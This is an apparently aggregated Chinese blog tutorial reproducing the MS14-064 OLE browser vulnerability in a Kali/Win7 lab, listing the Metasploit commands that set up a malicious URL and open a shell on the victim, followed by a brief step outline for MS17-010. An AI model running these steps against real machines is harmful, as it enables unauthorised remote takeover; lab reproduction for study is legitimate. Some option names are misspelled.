ms14_064漏洞复现

Posted hkgan

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ms14_064漏洞复现相关的知识,希望对你有一定的参考价值。

一、环境准备

   win7虚拟机x1

  kali Linux虚拟机x1

二、实验步骤

1.打开kali虚拟机终端命令行输入以下命令启动metasploit

msfconsole

2.输入以下命令搜索ms14漏洞,并在其中找到metasploit的漏洞利用模块exploit/windows/browser/ms14_064_ole_code_execution

search ms14

3.输入以下命令加载漏洞利用模块

use exploit/windows/browser/ms14_064_ole_code_execution

   这里可以看到我们的漏洞利用模块已经被启动。

4.输入以下命令查看相关设置

show options

  需要我们注意的是这里的AllowPowershellP默认为false,SRCVHOST默认为0.0.0.0,需要我们手动更改。

5.分别输入以下两个命令更改设置,注意这里我的kali虚拟机IP地址为192.168.15.138,可以在终端输入ifconfig查看自己的IP地址。

set AllowPowershellP true    #设置AllowPowershellP为true
set SRVHOST 192.168.15.138    #设置SRVHOST为192.168.15.138(需要更改为自己的kali虚拟机IP)

   设置更改完成后在终端输入exploit/rexploit执行可以得到一串URL地址。

6.轮到我们的受害者登场,开启win7虚拟机,使用IE浏览器访问刚才得到的地址。

  这时只要点击允许,这台win7虚拟机就被我们拿下啦!

7.回到kali虚拟机终端可以看到我们的受害者win7(IP地址为192.168.15.140)已经被拿下

  输入以下命令查看

sessions -i

 8.输入以下命令进入shell

sessions -i 1

  接下来就可以利用windows命令进行下一步的行动啦!

  后渗透阶段可以参考https://www.cnblogs.com/hkgan/p/17339860.html#h_393931448232551682048192605

漏洞复现之MS17_010

MS17_010漏洞复现与利用

第一步:查找相应的模块,选择自己需要的模块

第二步:使用相应的模块

第三步:查找对应的payload

第四步:设置对应的payload

第五步:显示设置的选项,yes的必须填写,并设置远程的主机IP地址和端口,这里默认445.

第六步:利用和攻击,执行run或者exploit命令

第七步:攻击成功后,进行漏洞利用,比如执行下面相应的命令




其它命令利用请看MSF的相关文章,里面已经标注了。里面有的后渗透命令已经不能用了,请自行查找。

以上是关于ms14_064漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

MS14-068域提权漏洞复现

永恒之蓝MS17-010漏洞复现

MS14-068域提权漏洞复现

基于Armitage的MSF自动化漏洞攻击实践

2019-2020-2 网络对抗技术 20175230滕星 Exp6 MSF基础应用

ms17_010(永恒之蓝)漏洞复现详细教程